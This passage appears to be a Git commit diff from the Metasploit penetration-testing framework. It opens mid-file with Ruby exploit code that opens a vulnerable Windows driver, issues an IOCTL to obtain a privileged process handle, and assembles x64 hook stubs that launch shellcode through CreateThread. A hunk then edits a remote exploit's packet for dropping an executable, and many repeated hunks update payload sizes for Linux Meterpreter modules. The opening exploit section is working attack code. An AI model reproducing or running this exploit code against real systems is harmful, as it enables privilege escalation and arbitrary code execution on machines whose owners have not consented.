fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
|
||||
result['return']
|
||||
end
|
||||
|
||||
# this is where the actual vulnerability is leveraged
|
||||
def get_handle(pid)
|
||||
handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
|
||||
return nil unless handle
|
||||
vprint_status('Successfully opened a handle to the driver')
|
||||
|
||||
buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
|
||||
|
||||
session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
|
||||
['DWORD', 'FileHandle', 'in' ],
|
||||
['DWORD', 'Event', 'in' ],
|
||||
['LPVOID', 'ApcRoutine', 'in' ],
|
||||
['LPVOID', 'ApcContext', 'in' ],
|
||||
['PDWORD', 'IoStatusBlock', 'out'],
|
||||
['DWORD', 'IoControlCode', 'in' ],
|
||||
['PBLOB', 'InputBuffer', 'in' ],
|
||||
['DWORD', 'InputBufferLength', 'in' ],
|
||||
['PBLOB', 'OutputBuffer', 'out'],
|
||||
['DWORD', 'OutputBufferLength', 'in' ],
|
||||
])
|
||||
result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
|
||||
return nil if result['return'] != 0
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
|
||||
result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
|
||||
end
|
||||
|
||||
def get_hook(shellcode_address, restore)
|
||||
dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
|
||||
return nil if dll_handle == 0
|
||||
create_thread_address = get_address(dll_handle, 'CreateThread')
|
||||
|
||||
stub = %{
|
||||
call main
|
||||
; restore the functions where the trampolines were installed
|
||||
push rbx
|
||||
}
|
||||
|
||||
restore.each do |function, trampoline_info|
|
||||
original = trampoline_info[:original].unpack('Q*')
|
||||
stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}"
|
||||
original.each do |chunk|
|
||||
stub << %{
|
||||
mov rbx, 0x#{chunk.to_s(16)}
|
||||
mov qword ptr ds:[rax], rbx
|
||||
add rax, 8
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
stub << %{
|
||||
pop rbx
|
||||
ret
|
||||
|
||||
main:
|
||||
; backup registers we're going to mangle
|
||||
push r9
|
||||
push r8
|
||||
push rdx
|
||||
push rcx
|
||||
|
||||
; setup the arguments for the call to CreateThread
|
||||
xor rax, rax
|
||||
push rax ; lpThreadId
|
||||
push rax ; dwCreationFlags
|
||||
xor r9, r9 ; lpParameter
|
||||
mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress
|
||||
xor rdx, rdx ; dwStackSize
|
||||
xor rcx, rcx ; lpThreadAttributes
|
||||
mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
|
||||
|
||||
call rax
|
||||
add rsp, 16
|
||||
|
||||
; restore arguments that were mangled
|
||||
pop rcx
|
||||
pop rdx
|
||||
pop r8
|
||||
pop r9
|
||||
ret
|
||||
}
|
||||
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
|
||||
end
|
||||
end
|
|
@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
pkt << "\x00\x00"
|
||||
pkt << "\x0A"
|
||||
pkt << "\x00"*31
|
||||
pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
|
||||
pkt << "\x00"*143
|
||||
pkt << "#{base}#{filename}\""
|
||||
pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example)
|
||||
|
||||
return pkt
|
||||
end
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 652264
|
||||
CachedSize = 675048
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 652264
|
||||
CachedSize = 675048
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 652264
|
||||
CachedSize = 675048
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 645136
|
||||
CachedSize = 668360
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 645136
|
||||
CachedSize = 668360
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 645136
|
||||
CachedSize = 668360
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 643904
|
||||
CachedSize = 666624
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 643904
|
||||
CachedSize = 666624
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 643904
|
||||
CachedSize = 666624
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1028600
|
||||
CachedSize = 1059232
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1028600
|
||||
CachedSize = 1059232
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1028600
|
||||
CachedSize = 1059232
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007024
|
||||
CachedSize = 1037012
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007024
|
||||
CachedSize = 1037012
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007024
|
||||
CachedSize = 1037012
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007120
|
||||
CachedSize = 1036276
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007120
|
||||
CachedSize = 1036276
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1007120
|
||||
CachedSize = 1036276
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 789100
|
||||
CachedSize = 789164
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 789100
|
||||
CachedSize = 789164
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 789100
|
||||
CachedSize = 789164
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 790264
|
||||
CachedSize = 855864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 790264
|
||||
CachedSize = 855864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 790264
|
||||
CachedSize = 855864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 704512
|
||||
CachedSize = 729120
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 704512
|
||||
CachedSize = 729120
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 704512
|
||||
CachedSize = 729120
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 744060
|
||||
CachedSize = 772796
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 744060
|
||||
CachedSize = 772796
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 744060
|
||||
CachedSize = 772796
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 868848
|
||||
CachedSize = 893496
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 868848
|
||||
CachedSize = 893496
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 868848
|
||||
CachedSize = 893496
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue